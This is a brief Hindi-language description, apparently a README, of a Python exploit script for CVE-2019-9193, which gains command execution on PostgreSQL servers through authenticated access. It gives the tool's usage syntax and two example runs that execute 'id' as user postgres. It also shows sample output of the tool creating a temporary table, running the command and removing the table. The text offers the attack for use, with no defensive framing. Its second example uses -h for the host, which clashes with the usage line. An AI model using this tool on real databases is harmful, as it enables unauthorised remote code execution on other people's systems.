
CVE-2019-9193 के लिए पायथन एक्सप्लॉइट स्क्रिप्ट, जो प्रमाणित कमांड इंजेक्शन के माध्यम से कमजोर PostgreSQL डेटाबेस पर दूरस्थ कोड निष्पादन को सक्षम करती है।
उपयोग: CVE-2019-9193.py [-h] [-i [IP]] [-p [PORT]] [-d [DATABASE]] [-c [COMMAND]] [-t [TIMEOUT]] [-U [USER]] [-P [PASSWORD]]
उदाहरण: python3 CVE-2019-9193.py -i 127.0.0.1 -p 5432 -U postgres -c 'id'
उदाहरण 2 : python3 CVE-2019-9193.py -h localhost -p 5432 -U postgres -c 'id'
आउटपुट:
[+] PostgreSQL डेटाबेस से 127.0.0.1:5432 पर कनेक्ट हो रहा है [+] डेटाबेस से कनेक्शन स्थापित हो गया [+] PostgreSQL संस्करण जाँच रहा है [+] PostgreSQL 9.3 शायद कमजोर है [+] तालिका _30e173ba7fa5577a86b9e9ecfea13360 बना रहा है [+] कमांड निष्पादित किया गया
uid=999(postgres) gid=999(postgres) groups=999(postgres),103(ssl-cert)
[+] तालिका _30e173ba7fa5577a86b9e9ecfea13360 हटा रहा है